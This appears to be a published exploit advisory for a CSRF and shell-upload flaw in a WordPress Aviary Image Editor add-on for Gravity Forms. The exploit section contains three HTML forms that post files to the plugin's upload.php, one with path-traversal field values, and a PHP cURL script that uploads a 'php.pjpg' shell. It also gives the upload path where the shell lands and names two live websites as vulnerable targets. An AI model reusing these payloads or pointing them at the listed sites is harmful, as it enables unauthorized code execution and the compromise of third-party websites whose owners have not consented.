####################################################################
# Exploit Title : WordPress Aviary Image Editor Add-On For Gravity Forms Plugins 3.0 Beta R7 CSRF Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 22/03/2020
# Vendor Homepage : wordpress.org
# Sofware Link : wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms/
# Software Affected Version : 3.0 (Beta r7) and other versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-352 [ Cross-Site Request Forgery (CSRF) ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Impact :
***********
The Aviary Image Editor Add-on For Gravity Forms plugin for WordPress
is prone to an arbitrary-file-upload vulnerability.
An attacker may leverage this issue to upload arbitrary files to the affected
computer; this can result in arbitrary code execution within the context of the
vulnerable application.
Aviary Image Editor Add-on For Gravity Forms 3.0 (beta) is vulnerable;
other versions may also be affected.
CWE-352: Cross-Site Request Forgery (CSRF)
******************************************
The web application does not, or can not, sufficiently verify whether a well-formed,
valid, consistent request was intentionally provided by the user who submitted the request.
When a web server is designed to receive a request from a client without any mechanism
for verifying that it was intentionally sent, then it might be possible for an attacker to trick a
client into making an unintentional request to the web server which will be treated as an
authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and
can result in exposure of data or unintended code execution.
CWE-264: Permissions, Privileges, and Access Controls
**************************************************
Weaknesses in this category are related to the management of permissions, privileges, and
other security features that are used to perform access control.
CWE-434: Unrestricted Upload of File with Dangerous Type
****************************************************
The software allows the attacker to upload or transfer files of dangerous types that can
be automatically processed within the product's environment.
####################################################################
# Arbitrary File Upload / Unauthorized File Insert / Shell Upload Exploit :
***************************************************************
CSRF Cross Site Request Forgery Exploiter 1 =>
******************************************
<form method="POST" action="VULNERABLEWEBSITEHERE/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
# CSRF Cross Site Request Forgery Exploit 2 =>
****************************************
<title>WordPress Aviary Image Editor Add-On For Gravity Forms Plugins Exploiter</title>
<form action="http://[VULNERABLEWEBSITE]/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php" method="post" enctype="multipart/form-data">
<body background=" ">
<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type=hidden">
<input name="name" value="kingskrupellos.php.pjpg" type=''hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">
# CSRF Cross Site Request Forgery Exploit 3=>
****************************************
<html>
<body>
<form action="http://www.[VULNERABLESITE].gov/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="WordPress Aviary Image Editor Add-On For Gravity Forms Plugins Exploiter Cyberizm" />
<input type="hidden" name="album_desc" value="WordPress Aviary Image Editor Add-On For Gravity Forms Plugins Exploiter Cyberizm" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
</form>
PHP Exploiter Code :
*********************
<?php
$uploadfile="kingskrupellos.php.pjpg"; /// KingSkrupellos ! Cyberizm Digital Security Army ^_^
$ch = curl_init("http://127.0.0.1/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
# Vulnerability Error :
********************
{"status":"error","message":"Unsupported File Type. Supported files","code":null}
{"status":"error","message":"Unsupported File Type. Supported files"}
Directory File Path :
******************
/wp-content/uploads/gform_aviary/_[SHELL].php.pjpg
####################################################################
# Example Vulnerable Sites :
************************
[+] solicitud.tenmas.es/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php
[+] rbmlumber.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################